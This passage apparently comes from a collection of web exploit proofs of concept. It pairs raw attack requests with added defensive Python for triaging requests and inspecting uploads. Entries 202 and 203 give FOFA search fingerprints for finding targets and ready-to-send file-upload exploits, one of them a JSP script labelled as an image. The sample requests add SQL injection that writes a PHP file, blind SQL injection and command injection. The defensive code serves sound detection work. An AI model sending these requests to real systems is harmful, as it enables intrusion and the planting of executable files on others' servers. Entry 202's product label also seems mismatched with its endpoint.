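def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path and decoded parameters.

    Query and form-encoded parameters are decoded one by one; any other body
    (JSON, even when sent with a form content type as in #195) is kept whole
    under the synthetic parameter name '<body>'.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split(" ")[:2]
    path, _, query = target.partition("?")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in lines[1:]) if k}
    params = dict(parse_qsl(query, keep_blank_values=True))
    body = body.strip()
    if body:
        is_form = "x-www-form-urlencoded" in headers.get("content-type", "")
        if is_form and not body.startswith(("{", "[")):
            params.update(parse_qsl(body, keep_blank_values=True))
        else:
            params["<body>"] = body
    return {"method": method, "path": path,
            "params": {k: expand_literals(v) for k, v in params.items()}}


def triage_request(raw: str) -> dict:
    """Parse a request and list, per parameter, the indicator labels it hits."""
    req = parse_request(raw)
    req["findings"] = {
        name: [label for label, rx in INDICATORS.items() if rx.search(value)]
        for name, value in req["params"].items()
        if any(rx.search(value) for rx in INDICATORS.values())
    }
    return req


# Constructed samples, copied from the PoC requests above (headers trimmed).
SAMPLES = {
    "185": ("GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27"
            "3c3f706870206563686f206d643528223122293b202466696c65203d205f5f4649"
            "4c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C"
            "%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1\n"
            "Host: host\n\n"),
    "186": ("POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\n"
            "Host: your-ip\nContent-Type: application/x-www-form-urlencoded\n\n"
            "req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),"
            "UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450\n"),
    "195": ("POST /send_order.cgi?parameter=operation HTTP/1.1\n"
            "Host: 127.0.0.1\nContent-Type: application/x-www-form-urlencoded\n\n"
            '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}\n'),
    "198": ("GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid="
            "%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1\n"
            "Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64\n\n"),
}

if __name__ == "__main__":
    for entry, raw in SAMPLES.items():
        result = triage_request(raw)
        print(f"#{entry} {result['method']} {result['path']}")
        for name, labels in result["findings"].items():
            print(f"  {name}: {labels} -> {result['params'][name][:80]!r}")
```

Run on entry 185 the decoder shows the unhex() blob is the self-deleting probe <?php echo md5("1"); $file = __FILE__; unlink($file); written under WebRoot; md5("1") is c4ca4238a0b923820dcc509a6f75849b, so that string in a later response for /plom.xgi would confirm the file write. The same decoder generalises to any payload that hides a shell behind hex or CHAR() encoding, which is why it is worth keeping beside a WAF rule that only matches the encoded form.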
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace __VIEWSTATE and __EVENTVALIDATION below with the values obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The part declares image/jpeg while carrying JSP source; the server trusts the declared type rather than the extension or the bytes.

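Entries 194, 199, 202 and 203 all reach code execution through a multipart upload that a gateway could have refused from the request alone: a filename with a path component, a server-executable extension, or a script body declared as an image. The script below is an added example written for this page; it is not code from the original article or from any vendor it lists. It parses a raw multipart/form-data request and applies those checks plus an image-magic check, returning a verdict and the violations per file part. The samples are constructed from entries 194 and 203 plus one benign JPEG upload; the extension list and labels are this example's policy, not a vendor's. Entry 192 passes the extension through the name query parameter rather than the multipart filename, so the same extension check has to be applied to that parameter there.

```python
"""Multipart upload inspector for the file-upload PoCs above (added example).

parse_multipart() splits a raw multipart/form-data request into parts,
inspect_part() applies the upload policy, decide() gives the verdict for the
whole request. SAMPLE_* are constructed from entries 194 and 203 (headers
trimmed) plus one benign JPEG upload; the policy lists are this example's.
"""
import re
from posixpath import basename

# Extensions a servlet, PHP or ASP.NET container executes if the file lands
# under the web root. Policy list of this example, not a vendor's.
EXEC_EXT = {"jsp", "jspx", "jspf", "php", "phtml", "php5", "asp", "aspx",
            "ashx", "asmx", "cer", "cfm", "cfc"}
# Bodies that open like a JSP/ASP (<%) or PHP (<?php, <?) script tag.
SCRIPT_START = re.compile(rb"^\s*<(\?php|\?|%)", re.I)
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def parse_multipart(raw: bytes) -> list:
    """Return one dict per part: name, filename, content_type, data (bytes).
    Line endings are normalised to LF so the PoC text above, pasted without
    CRLF, parses the same way a real capture does."""
    head, _, body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    m = re.search(rb"boundary=\s*([^\s;]+)", head, re.I)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delim = b"--" + m.group(1)
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter reached
            break
        hdr, _, data = chunk.lstrip(b"\n").partition(b"\n\n")
        headers = {}
        for line in hdr.decode("latin-1").split("\n"):
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": fname.group(1) if fname else None,
            "content_type": headers.get("content-type", ""),
            "data": data[:-1] if data.endswith(b"\n") else data,
        })
    return parts


def inspect_part(part: dict) -> list:
    """Policy violations for one file part; an empty list means it is clean."""
    if part["filename"] is None:
        return []                              # ordinary form field, not a file
    fname = part["filename"]
    issues = []
    if ".." in fname or "/" in fname or "\\" in fname:
        issues.append("path_traversal")        # #194 escapes the upload dir
    base = basename(fname.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext in EXEC_EXT:
        issues.append("executable_extension")  # .jsp/.php/.ashx would run
    if SCRIPT_START.match(part["data"]):
        issues.append("script_body")           # content is a script, whatever the name
    ctype = part["content_type"].lower()
    if ctype.startswith("image/") and not part["data"].startswith(IMAGE_MAGIC):
        issues.append("fake_image")            # #203 labels JSP as image/jpeg
    return issues


def decide(raw: bytes) -> dict:
    """Inspect every file part; reject the request if any part violates policy."""
    report = {p["filename"]: inspect_part(p)
              for p in parse_multipart(raw) if p["filename"] is not None}
    verdict = "reject" if any(report.values()) else "accept"
    return {"verdict": verdict, "parts": report}


# Constructed from the PoC requests above (headers trimmed).
SAMPLE_194 = (
    b"POST /servlet/uploadAttachmentServlet HTTP/1.1\nHost: host\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk\n\n"
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk\n"
    b'Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"\n'
    b"Content-Type: text/plain\n\n"
    b'<% out.println("hello");%>\n'
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk\n"
    b'Content-Disposition: form-data; name="json"\n\n'
    b'{"iq":{"query":{"UpdateType":"mail"}}}\n'
    b"------WebKitFormBoundaryKNt0t4vBe8cX9rZk--\n")
SAMPLE_203 = (
    b"POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1\nHost: x.x.x.x\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4\n\n"
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4\n"
    b'Content-Disposition: form-data; name="fj_file"; filename="11.jsp"\n'
    b"Content-Type:image/jpeg\n\n"
    b'<% out.print("hello,eHR");%>\n'
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4--\n")
# A legitimate JPEG upload (constructed) that the same policy must accept.
SAMPLE_OK = (
    b"POST /upload HTTP/1.1\nHost: host\n"
    b"Content-Type: multipart/form-data; boundary=ok\n\n"
    b"--ok\n"
    b'Content-Disposition: form-data; name="file"; filename="photo.jpg"\n'
    b"Content-Type: image/jpeg\n\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\n"
    b"--ok--\n")

if __name__ == "__main__":
    for label, raw in (("#194", SAMPLE_194), ("#203", SAMPLE_203), ("benign", SAMPLE_OK)):
        print(label, decide(raw))
```

The verdict is deliberately built from independent checks rather than a single allow-list of extensions: #194 would pass an extension-only check if the server renamed files, and #203 passes a content-type-only check, so a gateway should require all of a clean filename, a non-executable extension and bytes that match the declared type before writing anything under the web root.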